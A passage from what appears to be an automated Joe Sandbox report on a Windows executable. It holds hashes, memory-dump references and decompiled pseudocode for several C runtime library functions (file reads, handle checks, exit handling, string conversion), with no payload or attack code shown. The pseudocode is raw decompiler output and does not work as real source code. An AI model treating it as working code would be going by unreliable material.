                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2018770650-0
                                                                                                                                                                                                                              • Opcode ID: 6e2a768f73b6f6cc0e2b2ec921dac7e0dcd31a13e4f4915437f0081a859fc765
                                                                                                                                                                                                                              • Instruction ID: d449855dc58e02201a3320ac794e00d28ec250f96b2c09bc12605cc0a8f820c2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e2a768f73b6f6cc0e2b2ec921dac7e0dcd31a13e4f4915437f0081a859fc765
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8D0C956E58543A1E65437F70845078E1A02F44F2CFD00A34D41F812D1DE5CA185B561
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C466E0 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide_findclose
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2772937645-0
                                                                                                                                                                                                                              • Opcode ID: 551ac215682c7e938d8e11b1869496c2cb6e24a2aa748b5a2d70d965434d1a73
                                                                                                                                                                                                                              • Instruction ID: 8900a99d472d9f1be0020deda55cecbadba77d49bb37039f88391f30c2d6d105
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 551ac215682c7e938d8e11b1869496c2cb6e24a2aa748b5a2d70d965434d1a73
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5719E93E18BC691E611DB2CC5052FDA360F7A9B4CF94E321DB9C12596EF28E2D9C350
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5A9D4 Relevance: 1.6, APIs: 1, Instructions: 105COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                                                              			E00007FF77FF735C5A9D4(signed int __edi, intOrPtr* __rax, long long __rbx, signed char** __rcx, long long __rdi, long long __rsi, void* __r12, long long _a8, long long _a16, long long _a24) {
				void* _t55;
				signed int _t56;
				signed int _t76;
				signed int _t77;
				intOrPtr* _t94;
				signed char* _t96;
				void* _t109;
				signed char** _t117;

				_t98 = __rbx;
				_t94 = __rax;
				_t76 = __edi;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t117 = __rcx;
				if (__rcx != 0) goto 0x35c5aa06;
				E00007FF77FF735C53B18(__rax);
				 *__rax = 0x16;
				E00007FF77FF735C59400();
				goto 0x35c5ab25;
				if (( *(__rcx + 0x14) >> 0x0000000d & 0x00000001) == 0) goto 0x35c5ab25;
				if (( *(__rcx + 0x14) >> 0x0000000c & 0x00000001) != 0) goto 0x35c5ab25;
				if (( *(__rcx + 0x14) >> 0x00000001 & 0x00000001) == 0) goto 0x35c5aa35;
				asm("lock or dword [ecx+0x14], 0x10");
				goto 0x35c5ab25;
				asm("lock or dword [ecx+0x14], 0x1");
				if (( *(__rcx + 0x14) & 0x000004c0) != 0) goto 0x35c5aa49;
				E00007FF77FF735C61D34( *(__rcx + 0x14) & 0x000004c0, __rax, __rbx, __rcx, _t109);
				 *((long long*)(__rcx)) =  *((intOrPtr*)(__rcx + 8));
				_t55 = E00007FF77FF735C587E4(__rax, __rcx);
				r8d =  *((intOrPtr*)(__rcx + 0x20));
				_t56 = E00007FF77FF735C5A46C( *((intOrPtr*)(__rcx + 0x20)), _t55, _t76, _t98,  *((intOrPtr*)(__rcx + 8)),  *((intOrPtr*)(__rcx + 8)), __r12); // executed
				_t117[2] = _t56;
				_t19 = _t94 + 1; // 0x1
				if (_t19 - 1 <= 0) goto 0x35c5ab13;
				_t77 = _t76 | 0xffffffff;
				if ((_t117[2] & 0x00000006) != 0) goto 0x35c5aade;
				if (E00007FF77FF735C587E4(_t94, _t117) == _t77) goto 0x35c5aac9;
				if (E00007FF77FF735C587E4(_t94, _t117) == 0xfffffffe) goto 0x35c5aac9;
				E00007FF77FF735C587E4(_t94, _t117);
				E00007FF77FF735C587E4(_t94, _t117);
				goto 0x35c5aad0;
				if (( *0x7FF735C7B408 & 0x00000082) != 0x82) goto 0x35c5aade;
				asm("lock or dword [esi+0x14], 0x20");
				if (_t117[4] != 0x200) goto 0x35c5ab02;
				if ((_t117[2] >> 0x00000006 & 0x00000001) == 0) goto 0x35c5ab02;
				if ((_t117[2] >> 0x00000008 & 0x00000001) != 0) goto 0x35c5ab02;
				_t117[4] = 0x1000;
				_t96 =  *_t117;
				_t117[2] =  &(_t117[2][_t77]);
				 *_t117 =  &(_t96[1]);
				goto 0x35c5ab28;
				asm("sbb eax, eax");
				asm("lock or [esi+0x14], eax");
				_t117[2] = _t117[2] & 0x00000000;
				return  *_t96 & 0x000000ff | 0xffffffff;
			}











                                                                                                                                                                                                                              0x7ff735c5a9d4
                                                                                                                                                                                                                              0x7ff735c5a9d4
                                                                                                                                                                                                                              0x7ff735c5a9d4
                                                                                                                                                                                                                              0x7ff735c5a9d4
                                                                                                                                                                                                                              0x7ff735c5a9d9
                                                                                                                                                                                                                              0x7ff735c5a9de
                                                                                                                                                                                                                              0x7ff735c5a9e9
                                                                                                                                                                                                                              0x7ff735c5a9ef
                                                                                                                                                                                                                              0x7ff735c5a9f1
                                                                                                                                                                                                                              0x7ff735c5a9f6
                                                                                                                                                                                                                              0x7ff735c5a9fc
                                                                                                                                                                                                                              0x7ff735c5aa01
                                                                                                                                                                                                                              0x7ff735c5aa0e
                                                                                                                                                                                                                              0x7ff735c5aa1c
                                                                                                                                                                                                                              0x7ff735c5aa29
                                                                                                                                                                                                                              0x7ff735c5aa2b
                                                                                                                                                                                                                              0x7ff735c5aa30
                                                                                                                                                                                                                              0x7ff735c5aa35
                                                                                                                                                                                                                              0x7ff735c5aa42
                                                                                                                                                                                                                              0x7ff735c5aa44
                                                                                                                                                                                                                              0x7ff735c5aa53
                                                                                                                                                                                                                              0x7ff735c5aa56
                                                                                                                                                                                                                              0x7ff735c5aa5b
                                                                                                                                                                                                                              0x7ff735c5aa63
                                                                                                                                                                                                                              0x7ff735c5aa68
                                                                                                                                                                                                                              0x7ff735c5aa6b
                                                                                                                                                                                                                              0x7ff735c5aa71
                                                                                                                                                                                                                              0x7ff735c5aa7a
                                                                                                                                                                                                                              0x7ff735c5aa7f
                                                                                                                                                                                                                              0x7ff735c5aa8b
                                                                                                                                                                                                                              0x7ff735c5aa98
                                                                                                                                                                                                                              0x7ff735c5aa9d
                                                                                                                                                                                                                              0x7ff735c5aab3
                                                                                                                                                                                                                              0x7ff735c5aac7
                                                                                                                                                                                                                              0x7ff735c5aad7
                                                                                                                                                                                                                              0x7ff735c5aad9
                                                                                                                                                                                                                              0x7ff735c5aae5
                                                                                                                                                                                                                              0x7ff735c5aaef
                                                                                                                                                                                                                              0x7ff735c5aaf9
                                                                                                                                                                                                                              0x7ff735c5aafb
                                                                                                                                                                                                                              0x7ff735c5ab02
                                                                                                                                                                                                                              0x7ff735c5ab05
                                                                                                                                                                                                                              0x7ff735c5ab0e
                                                                                                                                                                                                                              0x7ff735c5ab11
                                                                                                                                                                                                                              0x7ff735c5ab15
                                                                                                                                                                                                                              0x7ff735c5ab1d
                                                                                                                                                                                                                              0x7ff735c5ab21
                                                                                                                                                                                                                              0x7ff735c5ab3f

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 96a451c57c0436cae101f592ba5b272fa9e63510b4af477c86ac81a4a15dc131
                                                                                                                                                                                                                              • Instruction ID: e699e1a6f256c0e9a34c7c8605fc677d8246fa8e0eccd0eae58457dab38380b1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96a451c57c0436cae101f592ba5b272fa9e63510b4af477c86ac81a4a15dc131
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3541E57390860767EA34AB9BA940179B3A1FB40F59F900A31DB8A47791CF7CE402E760
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5A46C Relevance: 1.6, APIs: 1, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                                                                              			E00007FF77FF735C5A46C(void* __ebx, signed int __ecx, signed int __edi, signed int __rbx, void* __rdx, signed int __rdi, signed int __r12, void* _a16, void* _a24, void* _a32) {
				signed int _t44;
				void* _t45;
				void* _t48;
				signed int* _t53;
				signed int* _t55;
				signed int* _t57;
				signed int* _t66;
				void* _t69;
				signed long long _t74;
				signed long long _t80;

				_t44 = __edi;
				_t53 = _t66;
				_t53[4] = __rbx;
				_t53[6] = __rdi;
				_t53[8] = __r12;
				_t53[2] = __ecx;
				r14d = r8d;
				if (__edi != 0xfffffffe) goto 0x35c5a4ae;
				E00007FF77FF735C53AF8(_t53);
				 *_t53 =  *_t53 & 0x00000000;
				E00007FF77FF735C53B18(_t53);
				 *_t53 = 9;
				goto 0x35c5a568;
				if (__ecx < 0) goto 0x35c5a550;
				_t48 = _t44 -  *0x35c8ae40; // 0x40
				if (_t48 >= 0) goto 0x35c5a550;
				_t80 = __ecx >> 6;
				_t74 = __ecx + __ecx * 8;
				_t55 =  *((intOrPtr*)(0x35c8aa40 + _t80 * 8));
				if (( *(_t55 + 0x38 + _t74 * 8) & 0x00000001) == 0) goto 0x35c5a550;
				if (r14d - 0x7fffffff <= 0) goto 0x35c5a504;
				E00007FF77FF735C53AF8(_t55);
				 *_t55 =  *_t55 & 0x00000000;
				E00007FF77FF735C53B18(_t55);
				 *_t55 = 0x16;
				goto 0x35c5a563;
				E00007FF77FF735C56228();
				_t57 =  *((intOrPtr*)(0x35c8aa40 + _t80 * 8));
				if (( *(0x35c8aa40 + 0x38 + _t74 * 8) & 0x00000001) != 0) goto 0x35c5a536;
				E00007FF77FF735C53B18(_t57);
				 *0x35c8aa40 = 9;
				E00007FF77FF735C53AF8(_t57);
				 *0x35c8aa40 =  *0x35c8aa40 & 0x00000000;
				goto 0x35c5a545;
				r8d = r14d;
				E00007FF77FF735C5A588(__edi, _t45, _t57, 0x35c8aa40, __rdx, _t69); // executed
				E00007FF77FF735C56310();
				goto 0x35c5a56b;
				E00007FF77FF735C53AF8(_t57);
				 *0x35c8aa40 =  *0x35c8aa40 & 0x00000000;
				E00007FF77FF735C53B18(_t57);
				 *_t57 = 9;
				return E00007FF77FF735C59400() | 0xffffffff;
			}













                                                                                                                                                                                                                              0x7ff735c5a46c
                                                                                                                                                                                                                              0x7ff735c5a46c
                                                                                                                                                                                                                              0x7ff735c5a46f
                                                                                                                                                                                                                              0x7ff735c5a473
                                                                                                                                                                                                                              0x7ff735c5a477
                                                                                                                                                                                                                              0x7ff735c5a47b
                                                                                                                                                                                                                              0x7ff735c5a488
                                                                                                                                                                                                                              0x7ff735c5a494
                                                                                                                                                                                                                              0x7ff735c5a496
                                                                                                                                                                                                                              0x7ff735c5a49b
                                                                                                                                                                                                                              0x7ff735c5a49e
                                                                                                                                                                                                                              0x7ff735c5a4a3
                                                                                                                                                                                                                              0x7ff735c5a4a9
                                                                                                                                                                                                                              0x7ff735c5a4b0
                                                                                                                                                                                                                              0x7ff735c5a4b6
                                                                                                                                                                                                                              0x7ff735c5a4bc
                                                                                                                                                                                                                              0x7ff735c5a4c8
                                                                                                                                                                                                                              0x7ff735c5a4d6
                                                                                                                                                                                                                              0x7ff735c5a4da
                                                                                                                                                                                                                              0x7ff735c5a4e4
                                                                                                                                                                                                                              0x7ff735c5a4ed
                                                                                                                                                                                                                              0x7ff735c5a4ef
                                                                                                                                                                                                                              0x7ff735c5a4f4
                                                                                                                                                                                                                              0x7ff735c5a4f7
                                                                                                                                                                                                                              0x7ff735c5a4fc
                                                                                                                                                                                                                              0x7ff735c5a502
                                                                                                                                                                                                                              0x7ff735c5a506
                                                                                                                                                                                                                              0x7ff735c5a515
                                                                                                                                                                                                                              0x7ff735c5a51f
                                                                                                                                                                                                                              0x7ff735c5a521
                                                                                                                                                                                                                              0x7ff735c5a526
                                                                                                                                                                                                                              0x7ff735c5a52c
                                                                                                                                                                                                                              0x7ff735c5a531
                                                                                                                                                                                                                              0x7ff735c5a534
                                                                                                                                                                                                                              0x7ff735c5a536
                                                                                                                                                                                                                              0x7ff735c5a53e
                                                                                                                                                                                                                              0x7ff735c5a547
                                                                                                                                                                                                                              0x7ff735c5a54e
                                                                                                                                                                                                                              0x7ff735c5a550
                                                                                                                                                                                                                              0x7ff735c5a555
                                                                                                                                                                                                                              0x7ff735c5a558
                                                                                                                                                                                                                              0x7ff735c5a55d
                                                                                                                                                                                                                              0x7ff735c5a584

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 9054cfc9f29aa42042bd96fb482c114a7b7c76725704b22add98395a705f466f
                                                                                                                                                                                                                              • Instruction ID: 0dfe57c178304f6d2bb14f5fa3cbc9d64499cb210f9b7de46830be58d13ddfe5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9054cfc9f29aa42042bd96fb482c114a7b7c76725704b22add98395a705f466f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 273170A3A18A0366E6127F978C4137DA650AB80FA9FD10935DE1D433D2CFBCA441E731
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C57DB9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                                                              			E00007FF77FF735C57DB9(void* __ecx, char __edx, intOrPtr* __rax, long long __rbx, long long _a8, char _a16, char _a24, char _a32) {
				long long _v16;
				long long _v24;
				char _v32;
				long long _v40;
				char _v48;
				char _v52;
				void* _v56;
				void* __rbp;
				void* _t29;
				intOrPtr* _t44;
				long long _t48;
				void* _t50;
				intOrPtr* _t52;
				void* _t55;
				WCHAR* _t56;

				_t48 = __rbx;
				_t44 = __rax;
				E00007FF77FF735C586B4(__rax, __rbx, _t50, _t55, _t56);
				asm("int3");
				_a24 = r8d;
				_a16 = __edx;
				_v40 = 0xfffffffe;
				_a8 = _t48;
				if (r8d != 0) goto 0x35c57e2f;
				GetModuleHandleW(_t56);
				if (_t44 == 0) goto 0x35c57e2f;
				if ( *_t44 != 0x5a4d) goto 0x35c57e2f;
				_t52 =  *((intOrPtr*)(_t44 + 0x3c)) + _t44;
				if ( *_t52 != 0x4550) goto 0x35c57e2f;
				if ( *((intOrPtr*)(_t52 + 0x18)) != 0x20b) goto 0x35c57e2f;
				if ( *((intOrPtr*)(_t52 + 0x84)) - 0xe <= 0) goto 0x35c57e2f;
				if ( *((intOrPtr*)(_t52 + 0xf8)) == 0) goto 0x35c57e2f;
				E00007FF77FF735C57EEC(0x20b, __ecx, _t44);
				_a32 = 0;
				_v32 =  &_a16;
				_v24 =  &_a24;
				_v16 =  &_a32;
				_v52 = 2;
				_v48 = 2;
				_t29 = E00007FF77FF735C57CBC(_t48,  &_v48,  &_v32,  &_v52); // executed
				if (_a24 == 0) goto 0x35c57e7d;
				return _t29;
			}


















                                                                                                                                                                                                                              0x7ff735c57db9
                                                                                                                                                                                                                              0x7ff735c57db9
                                                                                                                                                                                                                              0x7ff735c57db9
                                                                                                                                                                                                                              0x7ff735c57dbf
                                                                                                                                                                                                                              0x7ff735c57dc0
                                                                                                                                                                                                                              0x7ff735c57dc5
                                                                                                                                                                                                                              0x7ff735c57dd1
                                                                                                                                                                                                                              0x7ff735c57dd9
                                                                                                                                                                                                                              0x7ff735c57de3
                                                                                                                                                                                                                              0x7ff735c57de7
                                                                                                                                                                                                                              0x7ff735c57df0
                                                                                                                                                                                                                              0x7ff735c57dfa
                                                                                                                                                                                                                              0x7ff735c57e00
                                                                                                                                                                                                                              0x7ff735c57e09
                                                                                                                                                                                                                              0x7ff735c57e14
                                                                                                                                                                                                                              0x7ff735c57e1d
                                                                                                                                                                                                                              0x7ff735c57e26
                                                                                                                                                                                                                              0x7ff735c57e2a
                                                                                                                                                                                                                              0x7ff735c57e2f
                                                                                                                                                                                                                              0x7ff735c57e37
                                                                                                                                                                                                                              0x7ff735c57e3f
                                                                                                                                                                                                                              0x7ff735c57e47
                                                                                                                                                                                                                              0x7ff735c57e50
                                                                                                                                                                                                                              0x7ff735c57e53
                                                                                                                                                                                                                              0x7ff735c57e66
                                                                                                                                                                                                                              0x7ff735c57e70
                                                                                                                                                                                                                              0x7ff735c57e7c

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                              • Opcode ID: 22dcac6dfc1d9a47ae0e4f9b0395ff188e6b57aadd273cec63f84f15168c7fa1
                                                                                                                                                                                                                              • Instruction ID: 3961891c575ca8367391c96782316066278a2983c6ba0764bf3118091034488f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22dcac6dfc1d9a47ae0e4f9b0395ff188e6b57aadd273cec63f84f15168c7fa1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC216BB2A047479EEB28AFA5D4402BC73E0EB04B5CF941A3AD61C06AD5DF78D984D760
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C54BA8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                                                                                              			E00007FF77FF735C54BA8(intOrPtr __ebp, long long __rbx, short* __rcx, long long __rdx, long long __rbp, void* __r8, long long __r9, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t57;
				signed long long _t81;
				intOrPtr _t83;
				intOrPtr _t86;
				long long _t89;
				signed long long _t97;
				void* _t98;
				signed long long _t99;
				short* _t105;
				long long _t106;
				void* _t109;
				signed long long _t111;
				intOrPtr* _t117;
				long long _t125;

				r8d = 0x40;
				goto 0x35c54adc;
				asm("int3");
				_t81 = _t111;
				 *((long long*)(_t81 + 0x10)) = __rdx;
				_push(_t98);
				 *((long long*)(_t81 - 0x28)) = 0xfffffffe;
				 *((long long*)(_t81 + 0x18)) = __rbx;
				 *((long long*)(_t81 + 0x20)) = __rbp;
				_t89 = __r9;
				_t109 = __r8;
				_t105 = __rcx;
				r14d = 0;
				_t57 = r14d;
				if (__rcx == 0) goto 0x35c54bf7;
				if (__r8 != 0) goto 0x35c54bf3;
				goto 0x35c54d9d;
				 *((intOrPtr*)(__rcx)) = r14w;
				if (__rdx != 0) goto 0x35c54c29;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				_v48 = __r9;
				_v56 = _t125;
				r9d = 0;
				r8d = 0;
				E00007FF77FF735C59330(_t81, __r9, __rcx, __rdx, __rcx, __r8, __r8);
				goto 0x35c54d9d;
				if ( *((intOrPtr*)(__r9 + 0x28)) != r14b) goto 0x35c54c3c;
				E00007FF77FF735C53100(_t81 | 0xffffffff, __r9, __r9, _t105, _t125);
				_t83 =  *((intOrPtr*)(__r9 + 0x18));
				if ( *((intOrPtr*)(_t83 + 0xc)) != 0xfde9) goto 0x35c54c6f;
				_a8 = _t125;
				_v56 = __r9;
				_t97 =  &_a16;
				E00007FF77FF735C5EB98(_t83, __r9, _t105, _t97, _t109,  &_a8);
				goto 0x35c54d9d;
				if (_t105 == 0) goto 0x35c54d4e;
				if ( *((intOrPtr*)(_t83 + 0x138)) != _t125) goto 0x35c54ca7;
				if (_t109 == 0) goto 0x35c54c9f;
				 *_t105 =  *(_t98 + _t97) & 0x000000ff;
				if ( *(_t98 + _t97) == r14b) goto 0x35c54c9f;
				_t99 = _t98 + 1;
				_t106 = _t105 + 2;
				if (_t99 - _t109 < 0) goto 0x35c54c86;
				goto 0x35c54d9d;
				_v48 = __ebp;
				_v56 = _t106;
				r9d = _t57;
				E00007FF77FF735C5DE64();
				if (_t99 != 0) goto 0x35c54d9a;
				if (GetLastError() == 0x7a) goto 0x35c54ce9;
				 *((char*)(_t89 + 0x30)) = 1;
				 *((intOrPtr*)(_t89 + 0x2c)) = 0x2a;
				 *_t106 = r14w;
				goto 0x35c54c9f;
				r9d = __ebp;
				_t117 = _a16;
				if (__ebp == 0) goto 0x35c54d22;
				r9d = r9d - 1;
				if ( *_t117 == r14b) goto 0x35c54d22;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t89 + 0x18)))) + _t97 * 2)) - r14w >= 0) goto 0x35c54d1a;
				if ( *((intOrPtr*)(_t117 + 1)) == r14b) goto 0x35c54cd8;
				goto 0x35c54cf6;
				r8d = r8d - r10d;
				_t86 =  *((intOrPtr*)(_t89 + 0x18));
				_v48 = __ebp;
				_v56 = _t106;
				r9d = r8d;
				E00007FF77FF735C5DE64();
				if (_t86 != 0) goto 0x35c54d9d;
				goto 0x35c54cd8;
				if ( *((intOrPtr*)(_t86 + 0x138)) != _t125) goto 0x35c54d69;
				if ( *((intOrPtr*)(_t97 + (_t99 | 0xffffffffffffffff) + 1)) != r14b) goto 0x35c54d5b;
				goto 0x35c54c9f;
				_v48 = r14d;
				_v56 = _t125;
				r9d = _t57;
				E00007FF77FF735C5DE64();
				if (_t86 != 0) goto 0x35c54d9a;
				 *((char*)(_t89 + 0x30)) = 1;
				 *((intOrPtr*)(_t89 + 0x2c)) = 0x2a;
				goto 0x35c54c9f;
				return _t86;
			}




















                                                                                                                                                                                                                              0x7ff735c54ba8
                                                                                                                                                                                                                              0x7ff735c54bae
                                                                                                                                                                                                                              0x7ff735c54bb3
                                                                                                                                                                                                                              0x7ff735c54bb4
                                                                                                                                                                                                                              0x7ff735c54bb7
                                                                                                                                                                                                                              0x7ff735c54bbc
                                                                                                                                                                                                                              0x7ff735c54bc3
                                                                                                                                                                                                                              0x7ff735c54bcb
                                                                                                                                                                                                                              0x7ff735c54bcf
                                                                                                                                                                                                                              0x7ff735c54bd3
                                                                                                                                                                                                                              0x7ff735c54bd6
                                                                                                                                                                                                                              0x7ff735c54bd9
                                                                                                                                                                                                                              0x7ff735c54bdc
                                                                                                                                                                                                                              0x7ff735c54bdf
                                                                                                                                                                                                                              0x7ff735c54be5
                                                                                                                                                                                                                              0x7ff735c54bea
                                                                                                                                                                                                                              0x7ff735c54bee
                                                                                                                                                                                                                              0x7ff735c54bf3
                                                                                                                                                                                                                              0x7ff735c54bfa
                                                                                                                                                                                                                              0x7ff735c54bfc
                                                                                                                                                                                                                              0x7ff735c54c01
                                                                                                                                                                                                                              0x7ff735c54c09
                                                                                                                                                                                                                              0x7ff735c54c0e
                                                                                                                                                                                                                              0x7ff735c54c13
                                                                                                                                                                                                                              0x7ff735c54c16
                                                                                                                                                                                                                              0x7ff735c54c1b
                                                                                                                                                                                                                              0x7ff735c54c24
                                                                                                                                                                                                                              0x7ff735c54c2d
                                                                                                                                                                                                                              0x7ff735c54c32
                                                                                                                                                                                                                              0x7ff735c54c3c
                                                                                                                                                                                                                              0x7ff735c54c49
                                                                                                                                                                                                                              0x7ff735c54c4b
                                                                                                                                                                                                                              0x7ff735c54c50
                                                                                                                                                                                                                              0x7ff735c54c5d
                                                                                                                                                                                                                              0x7ff735c54c65
                                                                                                                                                                                                                              0x7ff735c54c6a
                                                                                                                                                                                                                              0x7ff735c54c72
                                                                                                                                                                                                                              0x7ff735c54c7f
                                                                                                                                                                                                                              0x7ff735c54c84
                                                                                                                                                                                                                              0x7ff735c54c8a
                                                                                                                                                                                                                              0x7ff735c54c91
                                                                                                                                                                                                                              0x7ff735c54c93
                                                                                                                                                                                                                              0x7ff735c54c96
